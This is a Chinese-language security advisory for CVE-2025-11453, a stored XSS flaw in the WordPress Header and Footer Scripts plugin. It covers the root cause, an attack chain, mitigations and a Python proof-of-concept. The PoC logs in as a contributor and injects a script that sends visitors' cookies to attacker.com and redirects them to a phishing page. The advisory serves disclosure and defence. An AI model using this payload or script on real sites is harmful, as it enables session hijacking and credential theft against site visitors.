CVE-2025-11453 WordPress Header and Footer Scripts插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11453

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Header and Footer Scripts WordPress插件

漏洞概述

CVE-2025-11453是WordPress平台上一个中危级别的安全漏洞，影响了Header and Footer Scripts插件2.3.0及以下所有版本。该插件是一款广受欢迎的WordPress工具，允许管理员在网站页面的头部和底部插入自定义脚本代码。然而，由于插件在处理_inpost_head_script参数时存在输入验证和输出编码不足的问题，导致恶意JavaScript代码可以被存储到数据库中。当其他用户访问包含恶意代码的页面时，这些脚本将在其浏览器上下文中执行，从而实现会话劫持、凭据窃取、重定向攻击等恶意操作。攻击者利用此漏洞需要具备WordPress网站的Contributor级别或更高权限，这意味着该漏洞主要威胁来自内部用户或被入侵的低权限账户。虽然CVSS评分仅为6.4（中危），但存储型XSS漏洞的危害不容忽视，因为它能够持久化地影响所有访问被注入页面的用户，包括管理员。

技术细节

该漏洞的根本原因在于Header and Footer Scripts插件对用户输入的_inpost_head_script参数缺乏充分的输入清理和输出转义。在WordPress的post meta机制中，该参数被用于存储每个页面的自定义头部脚本内容。攻击者通过构造包含恶意JavaScript代码的payload（如：<script>alert(document.cookie)</script>），利用插件功能将恶意代码保存到wp_postmeta表中。当其他用户访问该页面时，服务器从数据库读取并输出这段未经过滤的内容到HTML页面中，导致浏览器将其作为可执行脚本解析。攻击流程如下：1）攻击者创建或编辑WordPress文章/页面；2）在_inpost_head_script字段中注入XSS payload；3）保存文章，恶意脚本被存储到数据库；4）任何访问该页面的用户都会触发恶意脚本执行。由于该插件直接处理HTML输出而未使用htmlspecialchars()或esc_html()等函数进行转义，使得原始JavaScript代码得以原样输出和执行。

攻击链分析

STEP 1

1

攻击者获取WordPress网站的Contributor级别账户访问权限

STEP 2

2

攻击者登录后台，进入文章创建/编辑页面

STEP 3

3

在_inpost_head_script字段中构造包含恶意JavaScript代码的XSS payload

STEP 4

4

提交文章，恶意脚本被存储到wp_postmeta数据库表中

STEP 5

5

当其他用户访问被注入的页面时，服务器从数据库读取并输出未转义的恶意代码

STEP 6

6

受害者浏览器解析执行恶意JavaScript，导致Cookie窃取、会话劫持或重定向攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11453 PoC - Stored XSS in Header and Footer Scripts plugin
# Author: Security Researcher
# Target: WordPress with Header and Footer Scripts plugin <= 2.3.0

import requests
from bs4 import BeautifulSoup
import sys

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_contributor"
PASSWORD = "attacker_password"

def get_csrf_token(session, url):
    """Extract CSRF token from WordPress login page"""
    response = session.get(f"{url}/wp-login.php")
    soup = BeautifulSoup(response.text, 'html.parser')
    token = soup.find('input', {'name': 'wpnonce'})
    return token['value'] if token else None

def login_wordpress(session, username, password):
    """Authenticate to WordPress as contributor user"""
    csrf_token = get_csrf_token(session, TARGET_URL)
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f'{TARGET_URL}/wp-admin/',
        'wpnonce': csrf_token
    }
    response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data)
    return 'wordpress_logged_in' in str(session.cookies)

def inject_xss_payload(session):
    """Inject stored XSS payload via _inpost_head_script parameter"""
    # Create or edit a post
    post_url = f"{TARGET_URL}/wp-admin/post-new.php"
    response = session.get(post_url)
    
    # Extract nonce for post creation
    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_tag = soup.find('input', {'id': '_wpnonce'})
    post_nonce = nonce_tag['value'] if nonce_tag else None
    
    # XSS payload - steals cookies and redirects to attacker
    xss_payload = '''<script>fetch('https://attacker.com/steal?c='+document.cookie);document.location='https://attacker.com/phishing';</script>'''
    
    post_data = {
        'post_title': 'XSS Test Page',
        'content': 'This page contains stored XSS',
        '_inpost_head_script': xss_payload,
        'post_type': 'post',
        'action': 'editpost',
        '_wpnonce': post_nonce
    }
    
    response = session.post(post_url, data=post_data)
    print(f"[+] XSS payload injected successfully!")
    print(f"[+] Visit the created post to trigger the payload")

def main():
    session = requests.Session()
    
    print("[*] CVE-2025-11453 - Header and Footer Scripts Stored XSS")
    print("[*] Target: WordPress + Header and Footer Scripts <= 2.3.0")
    
    if login_wordpress(session, USERNAME, PASSWORD):
        print("[+] Login successful as contributor")
        inject_xss_payload(session)
    else:
        print("[-] Login failed")
        sys.exit(1)

if __name__ == "__main__":
    main()

影响范围

Header and Footer Scripts插件 <= 2.3.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）暂时禁用Header and Footer Scripts插件；2）审查并删除所有包含可疑<script>标签的页面内容；3）加强用户权限管理，限制Contributor账户数量；4）部署Content Security Policy (CSP)响应头限制内联脚本执行；5）使用WordPress安全插件监控异常的用户行为和内容修改。